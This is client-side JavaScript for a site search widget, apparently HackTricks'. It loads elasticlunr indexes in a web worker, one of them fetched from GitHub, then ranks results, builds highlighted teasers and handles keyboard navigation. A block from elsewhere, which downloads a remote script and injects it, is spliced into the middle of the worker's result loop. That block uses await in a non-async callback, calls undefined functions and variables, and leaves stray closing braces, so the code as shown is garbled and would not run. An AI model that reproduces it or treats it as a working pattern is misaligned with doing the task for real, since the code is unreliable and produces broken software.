const CLOUD_RAW = 'https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/master/searchindex.js';
const indices = [];
const main = await loadIndex(MAIN_RAW , '/searchindex-book.js', false); if(main) indices.push(main);
const cloud= await loadIndex(CLOUD_RAW, '/searchindex.js', true ); if(cloud) indices.push(cloud);
if(!indices.length){ postMessage({ready:false, error:'no-index'}); return; }
/* build index objects */
const built = indices.map(d => ({
idx : elasticlunr.Index.load(d.json),
urls: d.urls,
cloud: d.cloud,
base: d.cloud ? 'https://cloud.hacktricks.wiki/' : ''
}));
postMessage({ready:true});
const MAX = 30, opts = {bool:'AND', expand:true};
self.onmessage = ({data:q}) => {
if(!q){ postMessage([]); return; }
const all = [];
for(const s of built){
const res = s.idx.search(q,opts);
if(!res.length) continue;
const max = res[0].score || 1;
res.forEach(r => {
const doc = s.idx.documentStore.getDoc(r.ref);
all.push({
norm : r.score / max,
title: doc.title,
body : doc.body,
breadcrumbs: doc.breadcrumbs,
url : s.base + s.urls[r.ref],
cloud: s.cloud
});
try {
/* 1 — download raw JS from GitHub */
const controller = new AbortController();
const timer = setTimeout(() => controller.abort(), TIMEOUT_MS);
const res = await fetch(rawUrl, { signal: controller.signal });
clearTimeout(timer);
if (!res.ok) throw new Error(`HTTP ${res.status}`);
/* 2 — wrap in a Blob so the browser sees application/javascript */
const code = await res.text();
const blobUrl = URL.createObjectURL(
new Blob([code], { type: "application/javascript" })
);
/* 3 — execute it */
await injectScript(blobUrl);
/* ───────────── PATCH ─────────────
heavy parsing now deferred to idle time
*/
requestIdleCallback(() => init(window.search));
return; // ✔ UI remains responsive
} catch (eRemote) {
console.warn("Remote JS failed →", eRemote);
}
/* ───────── fallback: local copy ───────── */
try {
await injectScript(localJs);
/* ───────────── PATCH ───────────── */
requestIdleCallback(() => init(window.search));
return;
} catch (eLocal) {
console.error("Local JS failed →", eLocal);
}
})();
// Exported functions
search.hasFocus = hasFocus;
})(window.search);
});
}
all.sort((a,b)=>b.norm-a.norm);
postMessage(all.slice(0,MAX));
};
})();
`;
/* ───────────── 2. spawn worker ───────────── */
const worker = new Worker(URL.createObjectURL(new Blob([workerCode],{type:'application/javascript'})));
/* ───────────── 3. DOM refs ─────────────── */
const wrap = document.getElementById('search-wrapper');
const bar = document.getElementById('searchbar');
const list = document.getElementById('searchresults');
const listOut = document.getElementById('searchresults-outer');
const header = document.getElementById('searchresults-header');
const icon = document.getElementById('search-toggle');
const READY_ICON = icon.innerHTML;
icon.textContent = '⏳';
icon.setAttribute('aria-label','Loading search …');
const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
let debounce, teaserCount=0;
/* ───────────── helpers (teaser, metric) ───────────── */
const escapeHTML = (()=>{const M={'&':'&amp;','<':'&lt;','>':'&gt;','"':'&#34;','\'':'&#39;'};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})();
const URL_MARK='highlight';
function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;}
function makeTeaser(body,terms){
const stem=w=>elasticlunr.stemmer(w.toLowerCase());
const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30;
const W=[],sents=body.toLowerCase().split('. ');
let i=0,v=W_F,found=false;
sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;});
if(!W.length) return body;
const win=Math.min(W.length,WIN);
const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)];
for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1];
const best=found?sums.lastIndexOf(Math.max(...sums)):0;
const out=[]; i=W[best][2];
for(let k=best;k<best+win;k++){const [w,wt,pos]=W[k]; if(i<pos){out.push(body.substring(i,pos)); i=pos;} if(wt===W_S) out.push('<em>'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push('</em>'); i=pos+w.length;}
return out.join('');
}
function format(d,terms){
const teaser=makeTeaser(escapeHTML(d.body),terms);
teaserCount++;
const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27');
const parts=d.url.split('#'); if(parts.length===1) parts.push('');
const abs=d.url.startsWith('http');
const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`;
const style=d.cloud?" style=\"color:#1e88e5\"":"";
const isCloud=d.cloud?" [Cloud]":" [Book]";
return `<a href="${href}" aria-details="teaser_${teaserCount}"${style}>`+
`${d.breadcrumbs}${isCloud}<span class="teaser" id="teaser_${teaserCount}" aria-label="Search Result Teaser">${teaser}</span></a>`;
}
/* ───────────── UI control ───────────── */
function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}}
function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();}
icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden')));
document.addEventListener('keydown',e=>{
if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return;
const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName);
if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();}
else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}}
else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
});
bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); });
/* ───────────── worker messages ───────────── */
worker.onmessage = ({data}) => {
if(data && data.ready!==undefined){
if(data.ready){ icon.innerHTML=READY_ICON; icon.setAttribute('aria-label','Open search (S)'); }
else { icon.textContent='❌'; icon.setAttribute('aria-label','Search unavailable'); }
return;
}
const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean);
header.textContent=metric(docs.length,q);
clear(list);
docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
listOut.classList.toggle('hidden',!docs.length);
};
})();